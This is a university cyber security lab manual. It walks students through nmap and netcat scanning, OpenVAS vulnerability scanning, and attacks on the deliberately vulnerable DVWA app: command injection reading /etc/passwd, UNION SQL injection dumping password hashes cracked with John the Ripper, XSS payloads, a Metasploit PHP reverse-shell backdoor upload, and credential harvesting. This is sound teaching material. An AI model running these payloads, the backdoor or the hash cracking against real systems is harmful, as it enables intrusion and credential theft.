
Cyber Security LAB Manual SSASIT, Surat

Laboratory Manual




Bachelor of Engineering



Shree Swami Atmanand Saraswati Institute of Technology

Shree Swami Atmanand Vidya Sankul,

Kapodra, Varachha Road,

Surat – 395006

Cyber Security LAB Manual SSASIT, Surat



Aim 1: TCP Scanning using NMAP.

Aim 2: Port scanning using NMAP.


This lab will guide the student in installing the nmap tool and GUI in Windows. The student

will then perform a set of exercises that will familiarize them with the basic functionality of the

nmap scanning tool using both Linux and Windows.

Software Requirements: Nmap for Windows

VMware Image called: “” will be provided. It has nmap already installed.

OPTIONAL: MS .NET Framework 2.0 (Needed by Nmap GUI to work properly)


Nmap GUI for Windows

References: 1. (Nmap)

Part 1 – Installing Nmap on the Windows Guest

1. On the Windows Host O/S, download Nmap for Windows from the link above.

2. Double-click on the nmap-4.20-setup.exe file to install it. Follow the install wizard and

accept the default values.

Part 2 – Obtaining Your IP addresses

1. Use the ifconfig command in Linux and the ipconfig command in Windows to determine

your IP address and record it below: Windows (Host

O/S):________________________________ Linux (Guest O/S)


Part 3 – Performing a Scan of the Local Network

1. For the following steps, please use the nmap command line tool installed on the Linux Guest.

2. Scan your subnet to determine how many hosts can be found. For example, if you are on the subnet, you would enter the following command: nmap –sP 192.168.1.* What

is your subnet? ________________ How many hosts were found? ________________

3. Next perform a stealth scan (Please use the IP for your subnet): nmap –sS –P0 –p


4. Now, you’ll perform an OS identification. Use the Linux O/S to scan your Windows

machine: nmap –O Windows_IP_ADDRESS OS Type

1:______________________________ Now we want to use the Windows machine to scan

the Linux O/S. Go to a Windows DOS prompt and enter the following command: nmap –O

Linux_IP_ADDRESS OS Type 2:______________________________

Cyber Security LAB Manual SSASIT, Surat 5. Now we will perform a service selection scan. Let’s scan for all computers with FTP running.

We would do that as follows: nmap –p21 192.168.1.* List the IP addresses with that has the

FTP open: _____________________

Part 4 – Questions

For these questions please make use of the nmap man file.

1. What is the difference between a TCP connect scan and a SYN scan?

SYN Scan is a half open scan that is less likely to be logged; however it requires a

privileged user account to use it. The TCP connect make a full connection. This does not

require a privileged account but is likely to be logged.

2. What is the purpose of the sP command line switch?

Ping scan. Used to determine which hosts are up.

3. What is the purpose of the sS command line switch?

TCP SYN scan, A.K.A half open scan.

4. How accurate is the OS identification facility of nmap?

The OS identification is only an estimate and as good as the OS fingerprint database.

5. What is the name of the file that OS fingerprints are stored in for nmap? Where is it



6. What are the three main functions of nmap?

Host scanning, port scanning and OS Identificiation

7. What command would you issue to scan for computers running web servers?

nmap –p80 192.168.0.*

8. What nmap command was issued to receive the following output (find)?

nmap –????? –????

Starting Nmap 4.20 ( ) at 2007-09-05 05:02 Eastern Daylight Time

Initiating ARP Ping Scan at 05:02

Scanning [1 port]

Completed ARP Ping Scan at 05:02, 0.30s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 05:02

Completed Parallel DNS resolution of 1 host. at 05:02, 0.13s elapsed

Initiating ACK Scan at 05:02

Scanning [1697 ports]

Completed ACK Scan at 05:02, 0.11s elapsed (1697 total ports)

Host appears to be up ... good.

All 1697 scanned ports on are Unfiltered

MAC Address: 00:0C:29:00:DF:CA (VMware)

Nmap finished: 1 IP address (1 host up) scanned in 0.687 seconds

Raw packets sent: 1698 (67.922KB) | Rcvd: 1698 (67.922KB) nmap –sA –v

9. What is the purpose of the command illustrated in question 8?

This is an ACK scan. Is used to map out firewall rule sets.

Cyber Security LAB Manual SSASIT, Surat


Aim: TCP / UDP connectivity using Netcat.


Using Netcat for port scanning First let’s do a quick refresher on the command syntax of Netcat.

The most basic form of command is:

# nc [options] host port(s)

Options are described below

Host can be either an IP address or valid hostname

Ports can be a single port or a range of ports such as 20-53 or individual ports separated by

spaces. A port argument is always required for outbound connections, it can be numeric or a

name listed in /etc/services. However, if you use the –n switch only numeric arguments will be

valid for the port range.

NOTE: At the end of the lab you have a list of all of the switches we have mentioned and

their meaning. If you’re stuck you can consult this list.

LET’S GET STARTED Netcat has the ability to do either UDP or TCP port scanning. Of course there are better tools

out there to do this but sometimes some of these tools do require the installation of libraries in

order to work properly. It is NOT always possible to install libraries on remote hosts that have

been compromised. So a small tool that can do remote port scanning would be nice to have and

Netcat can fill this role very well and a lot of other ones.

A typical command to perform port scanning would be:

# nc –v –w 3 –z 20-150

The first portion of the command line that says: nc –v –w 3 which simply tells Netcat to give us

more verbose feedback and to timeout after 3 seconds if no connections could be established.

The –z switch prevent Netcat from sending any data to a TCP connection and it will only send

very limited data to a UDP connection.

The target in this case is:

Last but not least, we have the port range that will be used: 20-150.

Cyber Security LAB Manual SSASIT, Surat

TASK 1 You will perform a port scan using the TCP protocol. You will port scan your partner computer

or your VM machine if you’re working on your own. While doing this scan you wish to have

more verbose output than the default Netcat setting, you would also like to setup a timeout

value of 5 seconds, and you will scan the port range 20 to 100. Please write below what would

be the specific command you used to do this.

Answer: ________________________________________________________________________


Also write down below what ports numbers were detected as Open as you will need these

results a bit further in the lab.

Ports detected: ________________________________________________________________________


TASK 2 In this task you will repeat what you have done in TASK 1 but you will use the UDP protocol

instead of the TCP protocol. Write down the syntax used below.

Answer: ________________________________________________________________________


TASK 3 As you have seen in your previous tasks, scanning could be very noisy on a network. You will

most likely be detected by any anomaly or intrusion detection devices. In order to do this

smarter you will slow down your scan and use an interval of 5 second between probe and you

will randomize your port numbers as well. Write down the syntax below.

Answer: ________________________________________________________________________


________________________________________________________________________ ________________________________________________________________________

Cyber Security LAB Manual SSASIT, Surat


Aim: Network vulnerability using OpenVAS.


This exercise is an introduction to a vulnerability scanner called the Open Vulnerability

Assessment System, OpenVAS. Initially you will sweep the Team and Common Network for

reachable hosts. Then you will scan several hosts to determine their open services, fingerprint

the operating systems and applications, and listting known vulnerabilities. Finally, you will

choose a few vulnerabilities for which you will find known attacks.

Part 1 - Sweeping the network with nmap


Set up your exercise environment according to the specifications below, and annotate Figure 1


The Common Network is defined by, with the following host


o Your Linux VM address is 10.27.x.10

o Your Windows VM address is 10.27.x.20

o A Server at 10.27.x.1

o A Printer at

o A Mystery machine at 10.27.0.?

Test your network configuration by pinging the Sever VM from both your Linux VM

and your Windows VM.

Figure 1 - Exercise Network

Cyber Security LAB Manual SSASIT, Surat

Network Reconnaissance

The use of nmap to sweep networks for reachable hosts.

o (#) Record the hosts that are "up". There should be at least ten student machines

as well as two or three others.

(#) If you do a quick Operating System detection scan (using the -

O switch), can you tell which is which?

(#) Identify the machines below by providing their IP address.

Server VM

Mystery Machine

Your Windows VM

One colleague's Linux VM

Part 2 - Vulnerability scanning with OpenVAS

OpenVAS is a framework of several services and tools offering a comprehensive and powerful

vulnerability scanning and vulnerability management solution. It advertises itself as, "The

world's most advanced Open Source vulnerability scanner and manager." We will use

OpenVAS to conduct a vulnerability assessment of the machines identified as part of the

network reconnaissance conducted above.

Run the following script to run OpenVAS.


o This will take a few minutes to execute. When it does, accept the browser


State that you understand the risks, and add exception.

o Login using the username admin and password admin.

o OpenVAS will open in a browser window and appear as depicted in Figure 2


Figure 2 – OpenVAS

Cyber Security LAB Manual SSASIT, Surat

OpenVAS is a GUI-based application and is relatively easy to use once you learn a few basic

functions. Before you begin feel free to explore the various functions available within

OpenVAS; i.e., Scan Management, Asset Management, etc.

Learn how to conduct a simple scan by following the steps below to scan your Server


1. Create a new target

a. Configuration -> Targets

i. Select a New Target

ii. Provide a name for the new target

iii. Manually enter the host target's IP number

iv. Select the OpenVAS Default port list

v. Create the target

Create a new task using this target with a defaults scan configuration

. Scan Management -> New Task

. Provide a name for the new task

i. Select the "Full and fast" scan configuration

ii. Select the new target above as the scan target

iii. Select the default settings for the remainder

iv. Create the task

Start the scan task

. Scan Management

. Select the named task

i. Start the scan

ii. This will likely take several minutes, especially since you are not

the only one scanning the network.

Review the results

. View the ongoing results

. Periodically refresh the results until the task completes

i. View the details

Save the report.

. When the scan has completed select all three categories of threat: High,

Medium and Low

a. Within the Report Summary

. Select a TXT format report and download it

i. Move this report to your Desktop and rename it with a meaningful


Now create the targets and tasks necessary to scan the remainder of the machines

identified during the reconnaissance phase.

o Run these scans

While you are waiting for your scans to return results, try to determine if you are being


o For example, if you observe the network traffic by running tcpdump you will

note that there are a lot of packets traversing the network. This is not that helpful.

Cyber Security LAB Manual SSASIT, Surat

o Experiment with tcpdump filters until you think you have captured evidence of

your host being scanned, or have confirmed that you are not being scanned.

Hint: it will help if you can figure out how to filter out your own

scanning activity.

o (#) Record your successful tcpdump filter command.

Part 3 - Vulnerability assessment

When you have completed all OpenVAS scanning review the results for each host.

(#) Summarize the results by threat category for each host and reproduce the table below

in your report.

Identification Network IP High Treats Medium Threats Low Threats

Explore the high threat vulnerability findings for each host scanned.

o (#) For any three of these high threat vulnerabilities, summarize in your own

words the service that is vulnerable, why it is vulnerable, what exploit might the

vulnerability allow and what mitigation is required to reduce or eliminate the


(#) Which host do you feel is the most vulnerable? Why?

Record at least three Common Vulnerability Exposure identifiers for later investigation;

ie CVE-2007-xxxx.




Shutting down

Shut down the Linux VM

Shut down the Windows VM

Logout of the host.

You are not done yet - see next page!

Cyber Security LAB Manual SSASIT, Surat

Part 5 - Matching vulnerabilities with attacks

(#) Using a web browser (in another lab with Internet connectivity), investigate the three

CVEs recorded above, and record links to known attacks that may work against your

discovered vulnerabilities.





In this exercise you have learned the usefulness of a more powerful open-source vulnerability

scanner than one which just performs port scanning. Understanding which specific

vulnerabilities exist on your network provides invaluable information that should be used for:

1. planning and prioritizing patch management efforts;

2. planning and prioritizing intrusion detection efforts;

3. evolving / improving security architecture; and

4. evolving / improving respective security policies, directives and guidelines

Submit your lab report by moodle. Place files together in a zip file before sending. Include your

report and network traffic dump files.

Cyber Security LAB Manual SSASIT, Surat


Aim: Web application testing using DVWA.

Background Information

What is Damn Vulnerable Web App (DVWA)?

o Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is

damn vulnerable.

o Its main goals are to be an aid for security professionals to test their skills and

tools in a legal environment, help web developers better understand the

processes of securing web applications and aid teachers/students to teach/learn

web application security in a class room environment.

What is Command Execution?

o Command Execution is where a website application provides the ability to

execute system commands.

What is a Command Injection Attack?

o The purpose of the command injection attack is to inject and execute commands

specified by the attacker in the vulnerable application.

o In situations like this, the application, which executes unwanted system

commands, is like a pseudo system shell, and the attacker may use it

as an authorized system user.

o Note, the commands are executed with the same privileges as the application

and/or web server.

o Command injection attacks are possible in most cases because of lack of correct

input data validation, which can be manipulated by the attacker (forms, cookies,

HTTP headers etc.).

What is Command Injection Harvesting?

o Command Injection Harvesting is where a malicious user manipulates a website

command execution application to render sensitive data. (E.g., usernames,

config files, directory and file listings, etc).

Unix/Linux Example:; cat /etc/passwd

Windows Example: && dir

Lab Notes o In this lab we will do the following:

1. We will test Command Execution where Security is set to low

2. We will demonstrate how other linux/unix commands can be appended to

an IP Address for execution.

3. We will explore the code that allows for malicious use.

Cyber Security LAB Manual SSASIT, Surat

Step 1: Open Console Terminal and Retrieve IP Address

1. Start a Terminal Console

o Instructions: 1. Applications --> Terminal

2. Switch user to root

o Instructions: 1. su - root

2. <Whatever you set the root password to>

Cyber Security LAB Manual SSASIT, Surat 3. Get IP Address

o Instructions: 1. ifconfig -a

o Notes: As indicated below, my IP address is

Please record your IP address.

Step 2: Start Up Damn Vulnerable Web App (DVWA)

1. Start up a Web Browser

o Instructions:

1. Applications --> Internet --> Firefox

o Notes:

You can open up a Web browser on any Operating System on your


Working with DVWA does not have to be done on your Fedora machine,

the only requirement to play with DVWA is a follow

1. The Fedora Server is on the Network.

2. httpd is running

3. mysqld is running

Cyber Security LAB Manual SSASIT, Surat

DVWA Database setup



Replace with the IP Address obtained from Section

3, Step 3.

1. Username: admin

2. Password: password

"password" is the default password for user admin.

Cyber Security LAB Manual SSASIT, Surat

Set Website Security Level (Part 1)


0. Click on DVWA Security

Cyber Security LAB Manual SSASIT, Surat Set Website Security Level (Part 2)


0. Select Low

1. Click Submit

Step 3: Command Execution

1. Command Execution

o Instructions:

1. Click on Command Execution

2. Execute Ping

o Notes:

Below we are going to do a simply ping test using the web interface.

As an example, ping something on your network.

Use the IP Address obtained in Section 3, Step 3 if you have nothing else

to ping.

Cyber Security LAB Manual SSASIT, Surat



1. Click Submit

cat /etc/password (Attempt 1)


0. cat /etc/passwd

1. Click Submit


Notice that either a messaging saying illegal IP address was displayed or

nothing was returned.

Cyber Security LAB Manual SSASIT, Surat

cat /etc/password (Attempt 2)


0.; cat /etc/passwd

1. Click Submit


Notice that we are now able to see the contents of the /etc/passwd file.

Cyber Security LAB Manual SSASIT, Surat Looking at the weakness


0. Bring up a terminal window (See Section 3, Step 1, if you don't know


1. cat /var/www/html/dvwa/vulnerabilities/exec/source/low.php


0. Notice the two shell_exec lines.

1. These are the lines that execute ping depending on which Operating

System is being used.

2. In Unix/Linux command, you can run multiple command separated by a


3. Notice the code does not check that if $target matches an IP Address

\d+.\d+.\d+.\d+, where "\d+" represents a number with the

possibility of multiple digits, like

4. The code allows for an attacker to append commands behind the IP


1.; cat /etc/passwd

Copy the /etc/passwd file to /tmp

Instructions: 0.; cat /etc/passwd | tee /tmp/passwd

Note: Here we are not only displaying the contents of /etc/passwd on the

webpage, but also we are copying the /etc/passwd file to the /tmp


Cyber Security LAB Manual SSASIT, Surat

Step 4: Proof of Lab

1. Proof of Lab

o Instructions: 1. Bring up a terminal windows

2. cd /tmp

3. ls -l passwd

4. date

5. echo "Your Name"

Replace the string "Your Name" with your actual name.

e.g., echo "John Gray"

o Proof of Lab Instructions: 1. Do a <PrtScn>

2. Paste into a word document

3. Upload to Moodle

Cyber Security LAB Manual SSASIT, Surat


Aim: Manual SQL injection using DVWA.

Background Information

What is Damn Vulnerable Web App (DVWA)?

o Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is

damn vulnerable.

o Its main goals are to be an aid for security professionals to test their skills and

tools in a legal environment, help web developers better understand the

processes of securing web applications and aid teachers/students to teach/learn

web application security in a class room environment.

What is a SQL Injection?

o SQL injection (also known as SQL fishing) is a technique often used to attack

data driven applications.

o This is done by including portions of SQL statements in an entry field in an

attempt to get the website to pass a newly formed rogue SQL command to the

database (e.g., dump the database contents to the attacker). SQL injection is a

code injection technique that exploits a security vulnerability in an application's


o The vulnerability happens when user input is either incorrectly filtered for string

literal escape characters embedded in SQL statements or user input is not

strongly typed and unexpectedly executed. SQL injection is mostly known as an

attack vector for websites but can be used to attack any type of SQL database.

What is SQL Injection Harvesting?

o SQL Injection Harvesting is where a malicious user supplies SQL statements to

render sensitive data such as usernames, passwords, database tables, and more.

Lab Notes o In this lab we will do the following:

1. We use inject always true SQL statements into the SQL Injection User ID

field with security set to low.

2. We will obtain the username and raw-MD5 password contents from the

users table.

3. We will use John the Ripper to crack the raw-MD5 password HASH for

each user.

Cyber Security LAB Manual SSASIT, Surat

Step 1: Open Console Terminal and Retrieve IP Address

1. Start a Terminal Console

o Instructions: 1. Applications --> Terminal

2. Switch user to root

o Instructions: 1. su - root

2. <Whatever you set the root password to>

Cyber Security LAB Manual SSASIT, Surat 3. Get IP Address

o Instructions: 1. ifconfig -a

o Notes(FYI): As indicated below, my IP address is

Please record your IP address.

Step 2: Login to DVWA

1. Start Firefox

o Instructions: 1. Click on Firefox

Cyber Security LAB Manual SSASIT, Surat

2. Login to DVWA

o Instructions: 1. Start up Firefox on BackTrack

2. Place in the address bar.

Replace with Fedora's IP address obtained in

(Section 3, Step 3).

3. Login: admin

4. Password: password

5. Click on Login

Cyber Security LAB Manual SSASIT, Surat Step 3: Set Security Level

1. Set DVWA Security Level

o Instructions: 1. Click on DVWA Security, in the left hand menu.

2. Select "low"

3. Click Submit

Step 4: Manual SQL Injection

1. SQL Injection Menu

o Instructions: 1. Select "SQL Injection" from the left navigation menu.

2. Basic Injection

o Instructions: 1. Input "1" into the text box.

2. Click Submit.

3. Note, webpage/code is supposed to print ID, First name, and Surname to

the screen.

o Notes(FYI): Below is the PHP select statement that we will be exploiting, specifically


$getid = "SELECT first_name, last_name FROM users WHERE

user_id = '$id'";

Cyber Security LAB Manual SSASIT, Surat

Always True Scenario

Instructions: 0. Input the below text into the User ID Textbox (See Picture).

%' or '0'='0

1. Click Submit

Notes(FYI): In this scenario, we are saying display all record that are false and all

records that are true.

%' - Will probably not be equal to anything, and will be false.

'0'='0' - Is equal to true, because 0 will always equal 0.

Database Statement

mysql> SELECT first_name, last_name FROM users WHERE

user_id = '%' or '0'='0';

Cyber Security LAB Manual SSASIT, Surat

Display Database Version

Instructions: 0. Input the below text into the User ID Textbox (See Picture).

%' or 0=0 union select null, version() #

1. Click Submit

Notes(FYI): Notice in the last displayed line, 5.1.60 is displayed in the surname.

This is the version of the mysql database.

Cyber Security LAB Manual SSASIT, Surat

Display Database User

Instructions: 0. Input the below text into the User ID Textbox (See Picture).

%' or 0=0 union select null, user() #

Notes(FYI): Notice in the last displayed line, root@localhost is displayed in the


This is the name of the database user that executed the behind the scenes

PHP code.

Cyber Security LAB Manual SSASIT, Surat

Display Database Name

Instructions: 0. Input the below text into the User ID Textbox (See Picture).

%' or 0=0 union select null, database() #

Notes(FYI): Notice in the last displayed line, dvwa is displayed in the surname.

This is the name of the database.

Display all tables in information_schema

Instructions: 0. Input the below text into the User ID Textbox (See Picture).

%' and 1=0 union select null, table_name from

information_schema.tables #

1. Click Submit

Notes(FYI): Now we are displaying all the tables in the information_schema database.

The INFORMATION_SCHEMA is the information database, the place

that stores information about all the other databases that the MySQL

server maintains.

Cyber Security LAB Manual SSASIT, Surat

Display all the user tables in information_schema

Instructions: 0. Input the below text into the User ID Textbox (See Picture).

%' and 1=0 union select null, table_name from

information_schema.tables where table_name like 'user%'#

1. Click Submit

Notes(FYI): Now we are displaying all the tables that start with the prefix "user" in

the information_schema database.

Cyber Security LAB Manual SSASIT, Surat Display all the columns fields in the information_schema user table

Instructions: 0. Input the below text into the User ID Textbox (See Picture).

%' and 1=0 union select null,

concat(table_name,0x0a,column_name) from

information_schema.columns where table_name = 'users' #

1. Click Submit

Notes(FYI): Now we are displaying all the columns in the users table.

Notice there are a user_id, first_name, last_name, user

and Password column.

Display all the columns field contents in the information_schema user table

Instructions: 0. Input the below text into the User ID Textbox (See Picture).

%' and 1=0 union select null,

concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from

users #

1. Click Submit

Notes(FYI): Now we have successfully displayed all the necessary authentication

information into this database.

Cyber Security LAB Manual SSASIT, Surat

Step 5: Create Password Hash File

1. Create Password Hash File

o Instructions: 1. Highlight both admin and the password hash

2. Right Click

3. Copy

2. Open Notepad

o Instructions: 1. Applications --> Wine --> Programs --> Accessories --> Notepad

Cyber Security LAB Manual SSASIT, Surat

3. Paste in Notepad

o Instructions: 1. Edit --> Paste

Cyber Security LAB Manual SSASIT, Surat 4. Format in Notepad

o Instructions: 1. Place a ":" immediately after admin

2. Make sure your cursor is immediately after the ":" and hit the delete


3. Now you should see the user admin and the password hash separated by a

":" on the same line.

4. Cut the username and password combinations for gordonb, 1337, pablo,

and smitty from (Section 11, Step 1) and paste in this file as well.

5. Save in Notepad

o Instructions: 1. Navigate to --> /pentest/passwords/john

2. Name the file name --> dvwa_password.txt

3. Click Save

Cyber Security LAB Manual SSASIT, Surat

Step 6: Proof of Lab Using John the Ripper

1. Proof of Lab

o Instructions: 1. Bring up a new terminal, see (Section 7, Step 1)

2. cd /pentest/passwords/john

3. ./john --format=raw-MD5 dvwa_password.txt

4. date

5. echo "Your Name"

Replace the string "Your Name" with your actual name.

e.g., echo "John Gray"

o Proof of Lab Instructions: 1. Do a <PrtScn>

2. Paste into a word document

3. Upload to Moodle

Cyber Security LAB Manual SSASIT, Surat

Cyber Security LAB Manual SSASIT, Surat



Aim: XSS using DVWA.

Background Information

What is Damn Vulnerable Web App (DVWA)?

o Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is

damn vulnerable.

o Its main goals are to be an aid for security professionals to test their skills and

tools in a legal environment, help web developers better understand the

processes of securing web applications and aid teachers/students to teach/learn

web application security in a class room environment.

What is Cross Site Scripting?

o Cross-site scripting (XSS) is a type of computer security vulnerability typically

found in Web applications.

o XSS enables attackers to inject client-side script into Web pages viewed by other


o A cross-site scripting vulnerability may be used by attackers to bypass access

controls such as the same origin policy.

o In Addition, the attacker can send input (e.g., username, password, session ID,

etc) which can be later captured by an external script.

o The victim's browser has no way to know that the script should not be trusted,

and will execute the script. Because it thinks the script came from a trusted

source, the malicious script can access any cookies, session tokens, or other

sensitive information retained by the browser and used with that site.

Lab Notes o In this lab we will do the following:

1. We will test a basic cross site scripting (XSS) attack

2. We will test an iframe cross site scripting (XSS) attack

3. We will test a cookie cross site scripting (XSS) attack

4. We will create a php/meterpreter/reverse_tcp payload

5. We will start the php/meterpreter/reverse_tcp listener

6. We will upload the PHP payload to the DVWA Upload screen

7. We will test a PHP Payload cross site scripting (XSS) attack

Step 1: Open Console Terminal and Retrieve IP Address

1. Start a Terminal Console

o Instructions: 1. Applications --> Terminal

Cyber Security LAB Manual SSASIT, Surat


2. Switch user to root

o Instructions: 1. su - root

2. <Whatever you set the root password to>

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3. Get IP Address

o Instructions: 1. ifconfig -a

o Notes(FYI): As indicated below, my IP address is

Please record your IP address.

Step 2: Fix Stored Cross Site Scripting (XSS) Comment Box

1. Fix Character Limit

o Instructions: 1. cd /var/www/html/dvwa/vulnerabilities/xss_s/

2. vi index.php

3. Continue to Next Step

o Notes(FYI): 1. By default, the comment box in the XSS stored GUI will only allow for

50 characters. So we are going to change the character limit to 250

characters to demonstrate the following attacks.

Cyber Security LAB Manual SSASIT, Surat


2. Search for mtxMessage

o Instructions: 1. Press the "/" key

This will put in you search mode in the bottom left part of the


2. Type "mtxMessage" and hit <Enter>

Cyber Security LAB Manual SSASIT, Surat


3. Replace number

o Instructions: 1. Your cursor should now be on the "m" on the word mtxMessage.

2. Right Arrow over to the 5 after maxlength.

3. Press "i" and type "2"

This will place the number 2 in front of the number 50.

4. Press the <Esc> key

5. Type ":wq!"

Step 3: Open Console Terminal and Retrieve IP Address

1. Open a console terminal

o Instructions: 1. Click on the console terminal

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2. Get IP Address

o Instructions: 1. ifconfig -a

o Notes(FYI): As indicated below, my IP address is

Please record your IP address.

Step 4: Login to DVWA

1. Start Firefox

o Instructions: 1. Click on Firefox

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2. Login to DVWA

o Notes(FYI): Replace with Fedora's IP address obtained in (Section 3,

Step 3).

Instructions: 0. Start up Firefox on BackTrack

1. Place in the address bar.

2. Login: admin

3. Password: password

4. Click on Login

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Step 5: Set Security Level

1. Set DVWA Security Level

o Instructions: 1. Click on DVWA Security, in the left hand menu.

2. Select "low"

3. Click Submit

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Section 10: XSS Stored Basic Exploit Test

1. XSS Stored Menu

o Instructions: 1. Select "XSS Stored" from the left navigation menu.

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2. Basic XSS Test

o Instructions: 1. Name: Test 1

2. Message: <script>alert("This is a XSS Exploit Test")</script>

3. Click Sign Guestbook

3. View Test 1 Results

o Notes(FYI): 1. Notice that the JavaScript alert we just created is now displayed.

2. Every Time a user comes to this forum, this XSS exploit will be


3. This exploit can be easily modified to capture cookie/session information

for future Man-in-Middle attacks.

o Instructions: 1. Click OK

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Step 6: XSS Stored IFRAME Exploit Test

1. Reset Database

o Instructions: 1. Select "Setup" from the left menu navigation.

2. Click on the Create / Reset Database Button.

o Notes(FYI): We need to reset the database otherwise the each XSS exploit will appear

for each example.

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XSS Stored Menu

Instructions: 0. Select "XSS Stored" from the left navigation menu.

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XSS Test 2

Instructions: 0. Name: Test 2

1. Message: <iframe src=""></iframe>

2. Click Sign Guestbook

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View Test 2 Results

Notes(FYI): 0. Notice that CNN is displayed under "Test 2's" Message.

This is a powerful exploit because a user could use SET to create

Malicious cloned website and place in here.

e.g., Social Engineering Toolkit (SET): Lesson 3: Create

Malicious Weblink, Install Virus, Capture Forensic


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Step 7: XSS Stored COOKIE Exploit Test

1. Reset Database

o Instructions: 1. Select "Setup" from the left menu navigation.

2. Click on the Create / Reset Database Button.

o Notes(FYI): We need to reset the database otherwise the each XSS exploit will appear

for each example.

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XSS Stored Menu

Instructions: 0. Select "XSS Stored" from the left navigation menu.

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XSS Test 3

Instructions: 0. Name: Test 3

1. Message: <script>alert(document.cookie)</script>

2. Click Sign Guestbook

View Cookie

Notes(FYI): 0. Below is the cookie/session that the webserver establishes with the

current browser session.

1. An attacker could easily modify this XSS script to send the cookie to a

remote location instead of displaying it.

2. Image if this was a bank website. Every time a user logs in their cookie

information could be sent to a remote location.

Instructions: 0. Click OK.

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Step 8: Build PHP msfpayload

1. Open a console terminal

o Instructions: 1. Click on the console terminal

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2. Create msfpayload

o Notes(FYI): Replace with your BackTrack IP Address obtained from

(Section 7, Step 2).

Instructions: 0. mkdir -p /root/backdoor

1. cd /root/backdoor

2. msfpayload php/meterpreter/reverse_tcp


3. ls -l FORUM_BUG.php

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Edit FORUM_BUG.php

Instructions: 0. vi FORUM_BUG.php

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Remove the "#" character

Instructions: 0. Press "x" to delete the "#" character on the first line.

1. Press <Esc>

2. Type ":wq!"

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Step 9: Upload PHP Payload

1. Upload Menu

o Instructions: 1. Select "Upload" from the left navigation menu.

2. Click Browse

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2. Navigate to FORUM_BUG.php

o Instructions: 1. Click on root

2. Click on FORUM_BUG.php

3. Select Open

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3. Upload FORUM_BUG.php

o Instructions: 1. Click the Upload button

Step 10: Start PHP Payload Listener

1. Open a console terminal

o Instructions: 1. Click on the console terminal

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2. Start msfconsole

o Instructions: 1. msfconsole

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3. Start PHP Listener

o Notes(FYI): Replace with the BackTrack IP Address obtained from

(Section 7, Step 2).

Instructions: 0. use exploit/multi/handler

1. set PAYLOAD php/meterpreter/reverse_tcp

2. set LHOST

3. set LPORT 4444

4. exploit

5. Continue to Next Section

Step 11: XSS Stored window.location Exploit Test

1. Reset Database

o Instructions: 1. Select "Setup" from the left menu navigation.

2. Click on the Create / Reset Database Button.

o Notes(FYI): We need to reset the database otherwise the each XSS exploit will appear

for each example.

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XSS Stored Menu

Instructions: 0. Select "XSS Stored" from the left navigation menu.

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XSS Test 4

Instructions: 0. Name: Test 4

1. Message:


ploads/FORUM_BUG.php" </script>

Replace with the IP Address obtain from

Fedora 14 in (Section 3, Step 3).

2. Click Sign Guestbook

3. Click OK when the Test 1 Message is displayed

4. Continue To Next Section

Viewing XSS Test 3 Results

Instructions: 0. Notice how the "Connecting..." appears to be in an infinite loop.

1. This will continue for the duration of the PHP/MSF PAYLOAD exploit.

2. Continue To Next Section

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Step 12: View Metasploit Session

1. View Metasploit Session

o Notes(FYI): 1. Notice that BackTrack now has a connection into the Fedora 14


2. Continue to Next Step.

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2. Establishing a Shell

o Instructions: 1. shell

Establishes a "sh" shell.

2. tail /etc/passwd

This produces a potential prospect list for a ssh brute force attack.

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3. Find Configuration Files

o Instructions: 1. whoami

Displays the name of the user.

2. grep apache /etc/passwd

The goal of this command is obtaining the home directory for the

apache username.

3. find /var/www/* -print | grep config

Here I am wanting to find all the configuration files in the

/var/www directory.

4. Exploit the Configuration File

o Instructions:

1. grep "db_" /var/www/html/dvwa/config/ This produces the database name, username, and password

information to log into the mysql database.

2. echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD This command produces a table list of the dvwa database.

3. echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD This command describes the columns of the users table in the

dvwa datase.

4. echo "select user,password from dvwa.users;" | mysql -uroot -

pdvwaPASSWORD This command displays the user and password information for

each user in the dvwa.users table.

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5. Exploit the Configuration File

o Instructions:

1. echo "<pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html Place the html <pre> tag in the xss.html file.

The <pre> is used as a pre-formatter.

2. echo "select user,password from dvwa.users;" | mysql -uroot -

pdvwaPASSWORD >>

/var/www/html/dvwa/hackable/uploads/xss.html Place user and password for the dvwa.users table in the xss.html


3. echo "</pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html Place the close html </pre> tag in the xss.html file.

4. echo "<br>Your Name<br>" >>

/var/www/html/dvwa/hackable/uploads/xss.html Replace the string "Your Name" with your actual name.

5. date >> /var/www/html/dvwa/hackable/uploads/xss.html

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Step 13: Proof of Lab

1. Proof of Lab

o Instructions: 1. On BackTrack, place the below URI in Firefox

Replace the above IP address with the IP Address obtained

in (Section 3, Step 3).

o Proof of Lab Instructions: 1. Press the <Ctrl> and <Alt> keys at the same time.

2. Press the <PrtScn> key

3. Paste into a word document

4. Upload to Moodle

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Aim: Automated SQL injection with SqlMap.


Sqlmap is one of the most popular and powerful sql injection automation tool out there. Given a

vulnerable http request url, sqlmap can exploit the remote database and do a lot of hacking like

extracting database names, tables, columns, all the data in the tables etc. It can even read and

write files on the remote file system under certain conditions. Written in python it is one of the

most powerful hacking tools out there. Sqlmap is the metasploit of sql injections.

Sqlmap is included in pen testing linux distros like kali linux, backtrack, backbox etc. On other

distros it can be simply downloaded from the following url

Since its written in python, first you have to install python on your system. On ubuntu install

python from synaptic. On windows install activestate python. Check out this post for details on

how to install and run sqlmap on windows.

For the list of options and parameters that can be used with the sqlmap command, check the

sqlmap documentation at

In this lab we are going to learn how to use sqlmap to exploit a vulnerable web application and

see what all can be done with such a tool.

To understand this tutorial you should have thorough knowledge of how database driven web

applications work. For example those made with php+mysql.

Vulnerable Urls

Lets say there is a web application or website that has a url in it like this

and it is prone to sql injection because the developer of that site did not properly escape the

parameter id. This can be simply tested by trying to open the url'

We just added a single quote in the parameter. If this url throws an error or reacts in an

unexpected manner then it is clear that the database has got the unexpected single quote which

the application did not escape properly. So in this case this input parameter "id" is vulnerable to

sql injection.

Hacking with sqlmap

Now its time to move on to sqlmap to hack such urls. The sqlmap command is run from the

terminal with the python interpreter.

python -u ""

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The above is the first and most simple command to run with the sqlmap tool. It checks the input

parameters to find if they are vulnerable to sql injection or not. For this sqlmap sends different

kinds of sql injection payloads to the input parameter and checks the output. In the process
